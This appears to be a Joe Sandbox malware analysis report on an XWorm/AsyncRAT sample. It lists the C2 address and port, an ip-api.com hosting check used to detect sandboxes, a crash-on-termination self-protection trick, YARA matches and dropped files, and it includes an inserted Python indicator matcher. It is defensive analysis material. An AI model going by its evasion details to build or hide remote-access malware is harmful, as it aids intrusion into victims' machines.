Source: C:\Users\user\AppData\Roaming\svchost.exe | Network Connect: 45.141.26.134 7000
Source: Malware configuration extractor | URLs: 45.141.26.134
Source: Yara match | File source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.10:54562 -> 45.141.26.134:7000
Source: global traffic | TCP traffic: 192.168.2.10:54533 -> 162.159.36.2:53
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: SPECTRAIPSpectraIPBVNL
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.134
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
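The flow and HTTP entries above give two network indicators worth alerting on: the TCP session to 45.141.26.134:7000 (the C2 from the extracted configuration, also hit by Suricata SID 2852874) and the plain-text query to ip-api.com with fields=hosting, which the sample uses to learn whether its public IP belongs to a hosting or data-center range. As an added example, not part of the Joe Sandbox report, the Python below matches both indicators against a constructed flow/HTTP log; the space-separated line format, the sample lines and the hit names are assumptions made for the example.

```python
"""Network IOC matcher for the XWorm sample analysed above.

Added example, not part of the Joe Sandbox report. The log line format
below is a constructed, space-separated flow/HTTP log (an assumption):
    <ts> <src_ip>:<src_port> <dst_ip>:<dst_port> <proto> [<method> <host> <path>]
"""
import re
from dataclasses import dataclass

# Indicators taken from the report: the C2 endpoint and the hosting check.
C2_ENDPOINTS = {("45.141.26.134", 7000)}           # XWorm C2, Suricata SID 2852874
GEO_CHECK_HOST = "ip-api.com"
GEO_CHECK_PATH = re.compile(r"^/line/\?fields=hosting(?:&|$)")  # server replies "true"/"false"

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+(?P<dst>[\d.]+):(?P<dport>\d+)"
    r"\s+(?P<proto>\w+)(?:\s+(?P<method>[A-Z]+)\s+(?P<host>\S+)\s+(?P<path>\S+))?\s*$"
)

# Constructed sample log (not captured traffic); mirrors the flows listed above.
SAMPLE_LOG = """\
1735000001.1 192.168.2.10:54533 162.159.36.2:53 tcp
1735000002.4 192.168.2.10:54540 208.95.112.1:80 http GET ip-api.com /line/?fields=hosting
1735000003.9 192.168.2.10:54562 45.141.26.134:7000 tcp
1735000004.2 192.168.2.10:54570 93.184.216.34:443 tcp
1735000005.0 192.168.2.10:54580 208.95.112.1:80 http GET ip-api.com /json/
this line is garbage and must be skipped
"""


@dataclass(frozen=True)
class Hit:
    ts: str
    rule: str
    detail: str


def parse_line(line: str):
    """Return the parsed fields of one log line, or None if it does not fit the format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def match_event(ev: dict) -> list:
    """Apply both indicators to one parsed event."""
    hits = []
    if (ev["dst"], int(ev["dport"])) in C2_ENDPOINTS:
        hits.append(Hit(ev["ts"], "xworm_c2_connection", f"{ev['dst']}:{ev['dport']}"))
    if ev.get("host") == GEO_CHECK_HOST and ev.get("path") and GEO_CHECK_PATH.match(ev["path"]):
        hits.append(Hit(ev["ts"], "ip_api_hosting_check", f"{ev['method']} {ev['host']}{ev['path']}"))
    return hits


def scan(log_text: str) -> list:
    """Scan a whole log; malformed lines are skipped instead of aborting the hunt."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is not None:
            hits.extend(match_event(ev))
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h.ts, h.rule, h.detail)
```

Two caveats when turning this into a production rule: ip-api.com is queried by plenty of legitimate software, so alert on the fields=hosting form (or correlate the request with the requesting process, here an svchost.exe under %APPDATA%) rather than on the domain alone; and because the sample decides what to do based on the answer, a sandbox that lets the request through must make sure the response says false, otherwise the C2 traffic shown above never appears.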
Source: powershell.exe, 0000000E.00000002.1973377511.000002B033102000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 00000009.00000002.1798528406.000002239EB66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000009.00000002.1798528406.000002239EB66000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: svchost.exe, 00000003.00000002.2787361809.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2787361809.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: file.exe, 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, All function.exe, 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, svchost.exe, 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, svchost.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000006.00000002.1662916943.000001B29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1783062203.000002239646F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1953909365.000002B02AC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.1640787722.000001B280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ADC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: svchost.exe, 00000003.00000002.2787361809.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1640787722.000001B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ABA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1640787722.000001B280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386629000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ADC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: ALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.1798379341.000002239EA00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1973377511.000002B033142000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000012.00000002.2194708953.0000017F73B80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsu.S
Source: powershell.exe, 00000006.00000002.1640787722.000001B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1713072733.0000022386401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1836407309.000002B01ABA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2007933799.0000017F00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | String found in binary or memory: https://discord.gg/sGNBaJSzYD
Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | String found in binary or memory: https://discord.gg/sGNBaJSzYDstart
Source: powershell.exe, 00000012.00000002.2007933799.0000017F00229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: ALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: powershell.exe, 00000009.00000002.1798528406.000002239EB4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.5alC
Source: powershell.exe, 00000006.00000002.1662916943.000001B29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1783062203.000002239646F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1953909365.000002B02AC0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2149439595.0000017F1006C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | String found in binary or memory: https://qualityboy.rdcw.xyz/
Source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | String found in binary or memory: https://qualityboy.rdcw.xyz/slumzickx
Source: ALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | String found in binary or memory: https://scripts.sil.org/OFLThis
Source: ALL slumzick.exe, 00000004.00000002.2781899482.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570116462.00007FF6BB295000.00000008.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr | String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad

Operating System Destruction

Source: C:\Users\user\AppData\Roaming\svchost.exe | Process information set: 01 00 00 00 (the process sets its own BreakOnTermination flag to 1; once set, terminating the process triggers a system crash, which is how the dropped svchost.exe protects itself against being killed)

System Summary

Source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.All function.exe.38e6818.1.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 2.2.All function.exe.38e6818.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.file.exe.38b4c58.1.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.file.exe.38b4c58.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.file.exe.38a3c18.2.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.file.exe.38a3c18.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.All function.exe.38f8c58.2.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 2.2.All function.exe.38f8c58.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FF7C0CCE5B9
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FF7C0CC6E72
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FF7C0CC1290
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FF7C0CC1719
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FF7C0CC60C6
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FF7C0CC20F1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 3_2_00007FF7C0CC10A5
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 5_2_00007FF7C0CF1719
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 5_2_00007FF7C0CF20F1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 5_2_00007FF7C0CF1038
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 22_2_00007FF7C0CF1719
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 22_2_00007FF7C0CF20F1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 22_2_00007FF7C0CF1038
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 23_2_00007FF7C0CF1719
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 23_2_00007FF7C0CF20F1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 23_2_00007FF7C0CF1038
Source: file.exe, 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesvchos.exe4 vs file.exe
Source: file.exe, 00000000.00000000.1539464700.000000000149E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameAll function.exe4 vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenameAll function.exe4 vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 3.0.svchost.exe.950000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.All function.exe.38e6818.1.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 2.2.All function.exe.38e6818.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.file.exe.38b4c58.1.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.file.exe.38b4c58.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.file.exe.38a3c18.2.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.file.exe.38a3c18.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.All function.exe.38f8c58.2.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 2.2.All function.exe.38f8c58.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.file.exe.38b4c58.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.file.exe.38a3c18.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 2.2.All function.exe.38f8c58.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 2.2.All function.exe.38e6818.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: svchost.exe.0.dr, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, ySlzXr7X0ZHHczxmHVHsQU3CKETS2EyNvAKNuVj36WghZI4M0NfC1ZeRuCpP2opoN9e3ovh1.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.38a3c18.2.raw.unpack, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.38a3c18.2.raw.unpack, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.file.exe.38a3c18.2.raw.unpack, ySlzXr7X0ZHHczxmHVHsQU3CKETS2EyNvAKNuVj36WghZI4M0NfC1ZeRuCpP2opoN9e3ovh1.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.0.dr, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.38a3c18.2.raw.unpack, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.file.exe.38a3c18.2.raw.unpack, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@26/25@1/2
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\All function.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5976:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_03
Source: C:\Users\user\AppData\Roaming\svchost.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\All function.exe | Mutant created: \Sessions\1\BaseNamedObjects\iA9C1vysNYIl098GM
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3772:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
Source: C:\Users\user\AppData\Roaming\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\5tjosB4RVZjT5QLU
Source: C:\Users\user\Desktop\file.exe | Mutant created: \Sessions\1\BaseNamedObjects\0TU0C3RSTsWis1TFM
Source: C:\Users\user\AppData\Roaming\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
